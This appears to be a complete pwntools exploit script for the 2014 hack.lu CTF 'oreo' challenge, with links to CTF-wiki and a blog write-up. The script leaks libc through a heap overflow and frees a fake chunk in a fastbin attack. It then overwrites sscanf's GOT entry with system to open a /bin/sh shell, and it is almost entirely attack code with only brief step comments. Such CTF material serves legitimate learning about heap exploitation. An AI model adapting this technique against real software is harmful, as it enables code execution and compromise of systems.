1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
| from pwn import *
p = process('./oreo') elf = ELF("./oreo") libc = ELF('./libc.so.6') # context.log_level = 'debug'
def add(descrip, name): p.sendline('1') p.sendline(name) p.sendline(descrip)
def show_rifle(): p.sendline('2') p.recvuntil('===================================\n')
def order(): p.sendline('3')
def message(notice): p.sendline('4') p.sendline(notice) #print 'step 1. leak libc base' payload1 = 'a'*27+p32(elf.got['puts']) add('a'*25,payload1) show_rifle() p.recvuntil('===================================\n') p.recvuntil('Description: ') puts_addr = u32(p.recvuntil('\n', drop=True)[:4]) log.success('puts_addr: '+hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts'] system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + next(libc.search('/bin/sh')) log.success('system_addr: '+hex(system_addr)) log.success('binsh_addr: '+hex(binsh_addr))
#print 'step 2. free fake chunk at 0x0804A2A8' num = 1 while num < 0x3f: add('a'*25,'a'*27) num += 1
payload2 = 'a'*27+p32(0x0804a2a8) add('a'*25,payload2)
payload3 = '\x00'*0x20+p32(0x40)+p32(0x50) message(payload3) order() p.recvuntil('Okay order submitted!\n')
#print 'step 3. get shell' sscanf_got = elf.got['__isoc99_sscanf'] add(p32(sscanf_got),'a')
message(p32(system_addr)) p.sendline('/bin/sh\0')
p.interactive()
|
链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack/#2014-hacklu-oreo
链接:https://norw1nd.github.io/2018/08/27/2014-hack-lu-oreo/